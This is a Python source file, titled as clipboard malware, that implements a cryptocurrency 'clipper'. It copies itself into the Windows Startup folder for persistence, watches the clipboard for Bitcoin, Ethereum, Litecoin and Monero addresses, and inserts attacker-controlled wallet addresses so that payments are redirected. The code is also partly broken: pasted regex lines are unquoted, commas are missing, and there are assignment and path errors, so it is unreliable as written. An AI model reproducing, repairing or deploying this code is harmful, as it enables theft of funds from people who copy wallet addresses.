#Implementation for Clipboard Malware

import re
import os
import time
import shutil
import random
import difflib

import tkinter as tk

patterns = [
    r'^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$', # bitcoin
    r'^0x[a-zA-F0-9]{40}$', # Eth
    r'[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$' # Litecoin
    r'^4([0-9]|[A-B])(.){93}$' # Monero
    bc1[a-zA-HJ-NP-Z0-9]{35,99}($|\s) – Bitcoin
    (^|\s)[3]{1}[a-km-zA-HJ-NP-Z1-9]{25,34}($|\s) – Litecoin/Bitcoin Legacy
    (^|\s)D[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}($|\s) – Dogecoin
    (^|\s)0x[A-Fa-f0-9]{40}($|\s) – ERC-20 (i.e. Ethereum, Tether, Ripple, etc)
    (^|\s)[LM]{1}[a-km-zA-HJ-NP-Z1-9]{25,34}($|\s) – Litecoin Legacy
    ((^|\s)ltc1[a-zA-HJ-NP-Z0-9]{35,99}($|\s) – Litecoin
    (^|\s)8[0-9A-B]{1}[1-9A-HJ-NP-Za-km-z]{93,117}($|\s) – Monero
    (^|\s)4[0-9A-B]{1}[1-9A-HJ-NP-Za-km-z]{93,117}($|\s) – Monero

]

btc_address = [
    '1funaisj3j12Dfdf12d328sce', #fake bit coin address
]

eth_address = [
    '',
]

ltc_address = [
    '',
]

mon_address = [
    '',
]


def start_up():
    user = os.getlogin()
    basename = os.path.basename(__file__)
    shutil.copy(os.getcwd() + basename,'C:/Users/'+user+'/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/')


def clipper():
    while True:
        time.sleep(1)

        root = tk.Tk()
        clipboard = root.clipboard_get()
        
        for pattern in patterns:
            if re.match(pattern, clipboard):
                index = patterns.index(pattern)

                if index == 0:
                    address_list = btc_address

                elif index == 1:
                    address_list = eth_address

                elif index == 2:
                    address_list == ltc_address

                elif index == 3:
                    address_list = mon_address

                match_address = difflib.get_close_matches(clipboard, address_list) # Finds a close match
                if str(match_address) == '[]': # If no close match is found chose a random address
                    match_address = random.choice(address_list)

                root.clipboard_append(''.join(match_address))
            else:
                pass


if  __name__  == '__main__':
    start_up()
    clipper()
